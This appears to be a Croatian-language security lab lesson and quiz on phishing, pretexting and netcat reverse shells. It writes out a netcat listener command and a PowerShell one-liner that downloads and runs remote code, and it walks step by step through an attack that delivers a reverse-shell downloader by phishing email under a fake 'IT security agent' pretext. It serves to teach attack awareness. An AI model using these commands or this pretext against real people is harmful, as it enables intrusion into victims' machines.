Socijalni inženjering i phishing

Socijalni inženjering manipulira ljudskim ponašanjem umjesto tehničkim ranjivostima. Phishing je najčešći oblik — lažni email koji navodi žrtvu na akciju.

Elementi phishing emaila

  • Pretext — izmišljeni scenarij koji je uvjerljiv žrtvi (npr. "IT sektor — obavezna instalacija sigurnosnog agenta")
  • Urgentnost — pritisak na brzu akciju bez razmišljanja
  • Autoritet — lažni pošiljatelj s autoritetom (IT, CEO, HR)
  • Privici ili linkovi — maliciozni payload dostavljen phishingom

Spear phishing vs. Phishing

  • Phishing — masovni napad na veliki broj primatelja
  • Spear Phishing — ciljani napad na specifičnu osobu/organizaciju
  • Whaling — spear phishing usmjeren na visoki menadžment
  • Vishing — phishing putem telefona (Voice Phishing)
  • Smishing — phishing putem SMS poruka

Netcat reverse shell

Netcat listener na napadaču

nc -l -k -p 7890
  • -l — listen mode (sluša za dolazne veze)
  • -k — keep listening (ponovo sluša nakon isključenja)
  • -p 7890 — port na kojem sluša
  • Napadač pokreće listener PRIJE slanja payloada žrtvi

Reverse shell vs Bind shell

  • Reverse shell: žrtva se spaja na napadača (izlazni promet iz vatrozida)
  • Bind shell: napadač se spaja na žrtvu (teže kroz vatrozid)
  • Reverse shell je preferiraniji jer izlazni promet je manje filtriran
  • Port 7890 ili drugi neuobičajeni port za zaobilaženje filtera

rs-dl.bat i pretext

rs-dl.bat — reverse shell downloader

  • Batch skripta koja: preuzima reverse shell binary i pokreće ga
  • Dostavlja se phishing emailom kao privitak
  • Pretext: "Molimo pokrenite ovu skriptu za instalaciju sigurnosnog agenta"
  • PowerShell alternativa: IEX (New-Object Net.WebClient).DownloadString(URL)

Tijek phishing napada s reverse shellom

  1. Napadač pokreće nc listener: nc -l -k -p 7890
  2. Napadač šalje phishing email s rs-dl.bat privitkom
  3. Žrtva otvara email i pokreće rs-dl.bat (pretext)
  4. rs-dl.bat preuzima reverse shell payload i pokreće ga
  5. Payload se konektira na napadačev nc listener
  6. Napadač dobiva shell pristup žrtvinoj mašini
Zašto reverse shell prolazi kroz vatrozid? Vatrozidi često blokiraju dolazni promet ali dopuštaju odlazni. Reverse shell: žrtva inicira odlaznu vezu na napadačev IP:port. Ovo prolazi kroz firewall jer je "odlazni" promet. Bind shell (napadač inicira vezu na žrtvu) najčešće je blokiran dolaznim pravilima.
0 / 13
Odgovori na pitanja da vidiš rezultat.

1. Što je "pretext" u kontekstu socijalnog inženjeringa?

Pretext = izmišljeni (ali uvjerljivi) scenarij za manipulaciju. Primjer: napadač se predstavlja kao IT support i kaže da mora instalirati "sigurnosni agent" — žrtva povjeruje i pokreće malware. Pretext je temelj socijalnog inženjeringa.

2. Koja je razlika između phishinga i spear phishinga?

Phishing: mass campaign, isti email na tisuće primatelja, niski hit rate. Spear Phishing: personaliziran, istraživanje žrtve unaprijed (OSINT), visoki hit rate. Spear phishing zahtijeva više truda ali je uspješniji jer je email uvjerljiviji.

3. Što radi zastavica -k u naredbi nc -l -k -p 7890?

-k (keep) = kad se klient odspoji, netcat ostaje u listen modu i čeka sljedeću vezu umjesto da se ugasi. Korisno kad payload može pokušati višeput ili kad napadač želi primiti više veza od istog payloada.

4. Zašto je reverse shell lakši za prolaz kroz vatrozid od bind shella?

Vatrozidi tipično blokiraju DOLAZNI promet ali dopuštaju ODLAZNI. Reverse shell: žrtva inicira odlaznu vezu na napadačev IP:port → prolazi kao legitiman "odlazni" promet. Bind shell: napadač se spaja na žrtvu → blokiran incoming pravilima.

5. Koji je ispravan redoslijed — napadač mora pokrenuti nc listener PRIJE ili NAKON slanja payloada?

Napadač mora pokrenuti nc listener PRIJE slanja payloada. Kad žrtva izvrši payload, on odmah pokušava spojiti na napadačev IP:port. Ako listener nije pokrenut, veza ne može biti uspostavljena i payload se ugasi.

6. Što je rs-dl.bat?

rs-dl.bat (reverse shell downloader) = maliciozna batch (.bat) skripta koja preuzima reverse shell binary s napadačevog servera i pokreće ga. Dostavlja se kao email privitak uz pretext (npr. "sigurnosni agent").

7. Koji psihološki princip koristi napadač kad u phishing emailu piše "HITNO: Lozinka istječe za 2 sata — kliknite odmah"?

Urgency (urgentnost) = stvaranje vremenskog pritiska koji sprečava žrtvu da kritički razmisli. "Klikni odmah", "Ističe za 2 sata", "Hitno" — tipični urgentni okidači u phishingu. Napadači kombiniraju urgentnost s autoritetom za bolji učinak.

8. Kako se naziva phishing koji cilja visoke izvršne direktore (CEO, CFO)?

Whaling (lov na kitove) = spear phishing usmjeren na "velike ribe" — visoke direktore, CFO, CEO. Ovi napadi su iznimno personalizirani i mogu rezultirati velikim financijskim gubicima (npr. BEC — Business Email Compromise).

9. Na koji port sluša netcat listener u ovom labu?

Lab koristi port 7890 za nc listener: nc -l -k -p 7890. Neuobičajeni portovi (poput 7890) se koriste jer su manji šansa da budu blokirani firewall pravilima, za razliku od standardnih (22, 80, 443) koji su strože nadzirani.

10. Koji je pojam za phishing napad koji se provodi putem SMS poruka?

Smishing (SMS + Phishing) = phishing putem tekstualnih poruka. Tipično sadrži lažni link na phishing stranicu ili zahtjev za hitnom akcijom. Smishing je rastući vektor jer SMS linkovi izgledaju kratko i nije vidljiv cijeli URL.

11. U laboratorijskom scenariju, koji pretext koristi napadač za dostavu rs-dl.bat?

Lab pretext: napadač se pretvara da je IT sektor i traži pokretanje "sigurnosnog agenta" (rs-dl.bat). Ovo je uvjerljivo jer: 1) IT ima autoritet, 2) sigurnosni agent zvuči legitimno, 3) zaposlenici su navikli na takve zahtjeve od IT-a.

12. Koji je napad gdje napadač kreira kopiju legitimnog emaila (koji je žrtva već primila) ali mijenja link u maliciozni?

Clone Phishing = napadač kopira legitiman email koji je žrtva prethodno primila, mijenja link ili privitak u maliciozni, i šalje ga kao "resend" ili "updated version". Izgleda autentično jer je baziran na stvarnom emailu.

13. Zašto je netcat (nc) koristan alat za penetracijske testere?

Netcat je "Swiss Army knife" mrežnih alata: može raditi kao klient ili server, prenositi datoteke, kreirati chat, testirati portove, i što je bitno za pentesting — kreirati i primati reverse/bind shellove. Preinstaliran na Linuxu, jednostavne sintakse.
0 / 13
Riješi kviz da vidiš rezultat.